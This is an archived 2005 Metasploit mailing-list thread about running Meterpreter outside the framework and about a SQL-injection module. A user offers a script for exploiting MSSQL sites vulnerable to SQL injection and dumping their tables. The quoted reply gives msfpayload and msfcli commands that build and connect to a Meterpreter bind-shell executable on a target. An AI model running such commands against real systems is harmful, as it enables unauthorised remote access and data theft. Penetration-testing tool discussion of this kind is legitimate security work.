Metasploit mailing list archives

using Meterpreter , out of MSF // SQL Injection module

From: RaMatkal at hotmail.com (RaMatkal)
Date: Thu, 27 Oct 2005 14:10:24 +0200

I have written a perl script which i regularly use that exploits sites 
vulnerable to SQL injection running MSSQL....

It enumerates the database and is able to write the first 'x' rows of each 
table into .csv files....

Never thought about integrating it into metasploit though....

Let me know if anyone is interested in this...

----- Original Message ----- 
From: "H D Moore" <hdm at metasploit.com>
To: <framework at metasploit.com>
Sent: Wednesday, October 26, 2005 6:11 AM
Subject: Re: [framework] using Meterpreter , out of MSF // SQL Injection 
module

On Tuesday 25 October 2005 19:07, Hamid . K wrote:

I was curious , if anyone tried to load meterpreter
library , out of framework ?


The easy way:
$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it.
After executing it, you can use the "payload_handler" exploit to connect
and interact with it:
$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 \
RHOST=<target_system> E

Alternatively, you can use the source code in ./src and just build your
own client/server implementation using it.

Second ;
Is the idea of adding an automated sql-injection
module to MSF .


The problem there is that version 2.x is exploit-driven - if you can't use
one of the standard payloads or accomplish a very specific task, then it
means writing a whole library around post-sql-injection remote
compromise. Adding a mysql module means creating paylaods for uploading
files or executing commands via the mysql stored procedures (load data
infile, the UDF stuff that abuses blank passwords, etc). If someone came
up with some plausible/useful payloads that would work with generic SQL
injection, I would definitely be interested in integrating it. Version
3.x is going to include "recon" modules, so a generic table enumeration
module would fit into it much better than 2.x.

-HD

Current thread:

using Meterpreter , out of MSF // SQL Injection module Hamid . K (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module str0ke (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module mmiller at hick.org (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module H D Moore (Oct 25)
  - using Meterpreter , out of MSF Hamid . K (Oct 26)
  - using Meterpreter , out of MSF // SQL Injection module RaMatkal (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module Jerome Athias (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module news-letters (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module mmiller at hick.org (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module Fabrice MOURRON (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module Andre Ludwig (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module Kurt Grutzmacher (Oct 27)
    - using Meterpreter , out of MSF // SQL Injection module jasf (Oct 27)
- <Possible follow-ups>
- using Meterpreter , out of MSF // SQL Injection module ahead at mediageneral.com (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Tim Brown (Oct 28)
  - using Meterpreter , out of MSF // SQL Injection module Hamid . K (Oct 28)

(Thread continues...)